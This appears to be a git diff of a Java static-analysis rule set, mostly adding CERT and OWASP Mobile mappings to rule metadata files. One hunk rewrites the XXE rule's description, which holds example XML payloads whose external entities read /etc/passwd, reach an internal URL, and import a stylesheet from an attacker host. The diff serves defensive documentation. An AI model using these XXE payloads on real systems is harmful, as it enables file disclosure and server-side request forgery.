--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2093_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2093_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2093",
"sqKey": "S2093",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "ERR54-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2095_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2095_java.json
index 930d3e1abbe..5b9ab0079d9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2095_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2095_java.json
@@ -20,6 +20,10 @@
"CWE": [
459,
772
+ ],
+ "CERT": [
+ "FIO04-J.",
+ "FIO42-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2111_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2111_java.json
index b53507a2b9e..5d2efdcb14b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2111_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2111_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2111",
"sqKey": "S2111",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "NUM10-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2151_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2151_java.json
index 9215cadedcc..6f699f76816 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2151_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2151_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2151",
"sqKey": "S2151",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MET12-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2159_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2159_java.json
index 898e7975c1f..5fa4ef20a2e 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2159_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2159_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2159",
"sqKey": "S2159",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "EXP02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2162_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2162_java.json
index 092502560cf..aa355c64b14 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2162_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2162_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2162",
"sqKey": "S2162",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MET08-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2164_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2164_java.json
index 553741e0e39..122d84b00fb 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2164_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2164_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2164",
"sqKey": "S2164",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "FLP02-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2168_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2168_java.json
index 6de493e1daa..b754f673bbf 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2168_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2168_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
609
+ ],
+ "CERT": [
+ "LCK10-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2175_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2175_java.json
index b7f2c68f33f..a9629e0266b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2175_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2175_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2175",
"sqKey": "S2175",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "EXP04-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2178_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2178_java.json
index 7ff1ccee240..ea2a6346035 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2178_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2178_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2178",
"sqKey": "S2178",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "EXP46-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2184_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2184_java.json
index 8b7c69aa367..88b62dc6a8d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2184_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2184_java.json
@@ -19,6 +19,10 @@
"securityStandards": {
"CWE": [
190
+ ],
+ "CERT": [
+ "NUM50-J.",
+ "INT18-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2189_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2189_java.json
index 20c7eb00fef..7f7f60a60c0 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2189_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2189_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2189",
"sqKey": "S2189",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MSC01-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2197_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2197_java.json
index 6556bff5322..40b9ca2fe05 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2197_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2197_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2197",
"sqKey": "S2197",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "NUM51-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2201_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2201_java.json
index cab8614227a..b360fb09d36 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2201_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2201_java.json
@@ -12,5 +12,11 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2201",
"sqKey": "S2201",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "EXP12-C.",
+ "EXP00-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2225_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2225_java.json
index f3d40c01923..f4a8974920f 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2225_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2225_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
476
+ ],
+ "CERT": [
+ "EXP01-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2226_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2226_java.json
index 9dc57d5bdbd..a50a1636853 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2226_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2226_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2226",
"sqKey": "S2226",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MSC11-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.html
index 32812720968..78b1c50b3bd 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.html
@@ -40,10 +40,15 @@ See
- OWASP Top 10 2017 Category A3 - Sensitive Data Exposure
+ - Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ - OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
- MITRE, CWE-338 - Use of Cryptographically Weak Pseudo-Random Number Generator
(PRNG)
- MITRE, CWE-330 - Use of Insufficiently Random Values
- MITRE, CWE-326 - Inadequate Encryption Strength
+ - MITRE, CWE-1241 - Use of Predictable Algorithm in Random Number Generator
- CERT, MSC02-J. - Generate strong random numbers
- CERT, MSC30-C. - Do not use the rand() function for generating pseudorandom numbers
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.json
index e84e6feff4c..ec3758ffd95 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2245_java.json
@@ -8,8 +8,8 @@
},
"tags": [
"cwe",
- "cert",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2245",
@@ -19,10 +19,22 @@
"CWE": [
338,
330,
- 326
+ 326,
+ 1241
],
"OWASP": [
"A3"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-6"
+ ],
+ "CERT": [
+ "MSC02-J.",
+ "MSC30-C.",
+ "MSC50-CPP."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2251_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2251_java.json
index 7d102157ee2..037077b6a08 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2251_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2251_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2251",
"sqKey": "S2251",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC54-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2259_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2259_java.json
index 9c3dfcc553d..473bf14c42a 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2259_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2259_java.json
@@ -17,6 +17,10 @@
"securityStandards": {
"CWE": [
476
+ ],
+ "CERT": [
+ "EXP34-C.",
+ "EXP01-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2274_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2274_java.json
index 6c917c266ac..fd05dcd7593 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2274_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2274_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2274",
"sqKey": "S2274",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "THI03-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2275_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2275_java.json
index 56098a46437..13031b65506 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2275_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2275_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2275",
"sqKey": "S2275",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "FIO47-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2276_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2276_java.json
index 39e7b87f53a..7e64c886a3d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2276_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2276_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2276",
"sqKey": "S2276",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "LCK09-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2326_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2326_java.json
index 4717682046e..3875b5728b0 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2326_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2326_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2326",
"sqKey": "S2326",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-CPP."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2384_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2384_java.json
index 1e1e7bcf75a..759ea4d92a2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2384_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2384_java.json
@@ -19,6 +19,11 @@
"CWE": [
375,
374
+ ],
+ "CERT": [
+ "OBJ05-J.",
+ "OBJ06-J.",
+ "OBJ13-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2386_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2386_java.json
index 73bb776817c..d0dd1f1ac45 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2386_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2386_java.json
@@ -19,6 +19,10 @@
"CWE": [
607,
582
+ ],
+ "CERT": [
+ "OBJ01-J.",
+ "OBJ13-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2390_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2390_java.json
index 4927cd6d9df..c31ae672f5b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2390_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2390_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2390",
"sqKey": "S2390",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL00-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2442_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2442_java.json
index 25a1230ee38..5ea6777fb6b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2442_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2442_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2442",
"sqKey": "S2442",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "LCK03-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2445_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2445_java.json
index 237d5623790..e98fbfd8d58 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2445_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2445_java.json
@@ -19,6 +19,9 @@
"CWE": [
412,
413
+ ],
+ "CERT": [
+ "LCK00-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2446_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2446_java.json
index 703a9438854..7c9169904c9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2446_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2446_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2446",
"sqKey": "S2446",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "THI02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2447_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2447_java.json
index c24fb2d3e4f..e9f94aee62b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2447_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2447_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
476
+ ],
+ "CERT": [
+ "EXP01-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2583_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2583_java.json
index 7379354766f..e4daf7c9773 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2583_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2583_java.json
@@ -22,6 +22,9 @@
489,
571,
570
+ ],
+ "CERT": [
+ "MSC12-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2589_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2589_java.json
index 2108d2f12bf..42f48950b7f 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2589_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2589_java.json
@@ -21,6 +21,9 @@
489,
571,
570
+ ],
+ "CERT": [
+ "MSC12-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2612_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2612_java.json
index 5ac03914b06..a6c515b699a 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2612_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2612_java.json
@@ -23,6 +23,10 @@
],
"OWASP": [
"A5"
+ ],
+ "CERT": [
+ "FIO01-J.",
+ "FIO06-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2637_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2637_java.json
index 9efd1ec423b..213b982ec51 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2637_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2637_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
476
+ ],
+ "CERT": [
+ "EXP01-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2674_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2674_java.json
index b3329c28615..f9375fa7ac2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2674_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2674_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2674",
"sqKey": "S2674",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "FIO10-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2681_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2681_java.json
index a4538855ecd..6835616f3f2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2681_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2681_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
483
+ ],
+ "CERT": [
+ "EXP52-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2693_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2693_java.json
index a9fc7ee12aa..d2599ee9f8e 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2693_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2693_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2693",
"sqKey": "S2693",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "TSM02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2755_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2755_java.html
index b5f9674a2f3..823aa686b0d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2755_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2755_java.html
@@ -1,204 +1,120 @@
-XML specification allows the use of entities that can be internal or external (file system /
-network access …) which could lead to vulnerabilities such as confidential file disclosures or SSRFs.
-Example in this XML document, an external entity read the /etc/passwd file:
+XML standard allows the use of entities, declared in the DOCTYPE of the document, which can be internal or external.
+When parsing the XML file, the content of the external entities is retrieved from an external storage such as the file system or network, which may
+lead, if no restrictions are put in place, to arbitrary file disclosures or server-side request forgery (SSRF) vulnerabilities.
<?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE test [
- <!ENTITY xxe SYSTEM "file:///etc/passwd">
- ]>
-<note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
- <to>&xxe;</to>
- <from>Jani</from>
- <heading>Reminder</heading>
- <body>Don't forget me this weekend!</body>
-</note>
-
-In this XSL document, network access is allowed which can lead to SSRF vulnerabilities:
-
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet version="1.0" xmlns:xsl="http://www.attacker.com/evil.xsl">
- <xsl:import href="http://www.attacker.com/evil.xsl"/>
- <xsl:include href="http://www.attacker.com/evil.xsl"/>
- <xsl:template match="/">
- &content;
- </xsl:template>
-</xsl:stylesheet>
+<!DOCTYPE person [
+ <!ENTITY file SYSTEM "file:///etc/passwd">
+ <!ENTITY ssrf SYSTEM "https://internal.network/sensitive_information">
+]>
+
+<person>
+ <name>&file;</name>
+ <city>&ssrf;</city>
+ <age>18</age>
+</person>
-It is recommended to disable access to external entities and network access in general.
-To protect Java XML Parsers from XXE attacks these
-properties have been defined since JAXP 1.5:
-
- - ACCESS_EXTERNAL_DTD: should be set to "" when processing XML/XSD/XLS files (it looks for external DOCTYPEs)
- - ACCESS_EXTERNAL_SCHEMA: should be set to "" when processing XML/XSD/XLS files (it looks for external schemalocation ect)
- - ACCESS_EXTERNAL_STYLESHEET should be set to "" when processing XLS file (it looks for external imports, includes ect);
-
-Note that Apache Xerces is still based on JAXP 1.4, therefore one solution is to set to
-false
the external-general-entities feature.
-Avoid FEATURE_SECURE_PROCESSING feature to protect from XXE attacks because depending on the implementation:
+It’s recommended to limit resolution of external entities by using one of these solutions:
- - it has no effect to protect the parser from XXE attacks but helps guard against excessive memory consumption from XML processing.
- - or it’s just an obscur shortcut (it could set ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA to "" but without guarantee).
+ - If DOCTYPE is not necessary, completely disable all DOCTYPE declarations.
+ - If external entities are not necessary, completely disable their declarations.
+ - If external entities are necessary then:
+
+ - Use XML processor features, if available, to authorize only required protocols (eg: https).
+ - And use an entity resolver (and optionally an XML Catalog) to resolve only trusted entities. == Noncompliant Code Example
+
-When setting an entity
-resolver to null
(eg: setEntityResolver(null)
) the parser will use its own resolution, which is unsafe.
-Noncompliant Code Example
-DocumentBuilderFactory library:
-
-String xml = "xxe.xml";
-DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
-DocumentBuilder builder = df.newDocumentBuilder(); // Noncompliant
-Document document = builder.parse(new InputSource(xml));
-DOMSource domSource = new DOMSource(document);
-
-SAXParserFactory library:
-
-String xml = "xxe.xml";
-SaxHandler handler = new SaxHandler();
-SAXParserFactory factory = SAXParserFactory.newInstance();
-SAXParser parser = factory.newSAXParser(); // Noncompliant
-parser.parse(xml, handler);
-
-XMLInputFactory library:
-
-XMLInputFactory factory = XMLInputFactory.newInstance(); // Noncompliant
-XMLEventReader eventReader = factory.createXMLEventReader(new FileReader("xxe.xml"));
-
-TransformerFactory library:
+For DocumentBuilder, SAXParser, XMLInput, Transformer and Schema JAPX factories:
-String xslt = "xxe.xsl";
-String xml = "xxe.xml";
-TransformerFactory transformerFactory = javax.xml.transform.TransformerFactory.newInstance(); // Noncompliant
-Transformer transformer = transformerFactory.newTransformer(new StreamSource(xslt));
+DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); // Noncompliant
-StringWriter writer = new StringWriter();
-transformer.transform(new StreamSource(xml), new StreamResult(writer));
-String result = writer.toString();
-
-SchemaFactory library:
-
-String xsd = "xxe.xsd";
-StreamSource xsdStreamSource = new StreamSource(xsd);
+SAXParserFactory factory = SAXParserFactory.newInstance(); // Noncompliant
-SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI); // Noncompliant
-Schema schema = schemaFactory.newSchema(xsdStreamSource);
-
-Validator library:
-
-String xsd = "xxe.xsd";
-String xml = "xxe.xml";
-StreamSource xsdStreamSource = new StreamSource(xsd);
-StreamSource xmlStreamSource = new StreamSource(xml);
+XMLInputFactory factory = XMLInputFactory.newInstance(); // Noncompliant
-SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
-Schema schema = schemaFactory.newSchema(xsdStreamSource);
-Validator validator = schema.newValidator(); // Noncompliant
+TransformerFactory factory = javax.xml.transform.TransformerFactory.newInstance(); // Noncompliant
-StringWriter writer = new StringWriter();
-validator.validate(xmlStreamSource, new StreamResult(writer));
+SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI); // Noncompliant
-Dom4j library:
+For Dom4j library:
-SAXReader xmlReader = new SAXReader(); // Noncompliant by default
-Document xmlResponse = xmlReader.read(xml);
+SAXReader xmlReader = new SAXReader(); // Noncompliant
-Jdom2 library:
+For Jdom2 library:
-SAXBuilder builder = new SAXBuilder(); // Noncompliant by default
-Document document = builder.build(new File(xml));
+SAXBuilder builder = new SAXBuilder(); // Noncompliant
Compliant Solution
-DocumentBuilderFactory library:
-
-String xml = "xxe.xml";
-DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
-df.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-df.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
-DocumentBuilder builder = df.newDocumentBuilder();
-Document document = builder.parse(new InputSource(xml));
-DOMSource domSource = new DOMSource(document);
-
-SAXParserFactory library:
-
-String xml = "xxe.xml";
-SaxHandler handler = new SaxHandler();
-SAXParserFactory factory = SAXParserFactory.newInstance();
-SAXParser parser = factory.newSAXParser();
-parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-parser.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
-parser.parse(xml, handler);
-
-XMLInputFactory library:
-
-XMLInputFactory factory = XMLInputFactory.newInstance();
-factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
-
-XMLEventReader eventReader = factory.createXMLEventReader(new FileReader("xxe.xml"));
-
-TransformerFactory library:
-
-String xslt = "xxe.xsl";
-String xml = "xxe.xml";
-TransformerFactory transformerFactory = javax.xml.transform.TransformerFactory.newInstance();
-transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); // Compliant
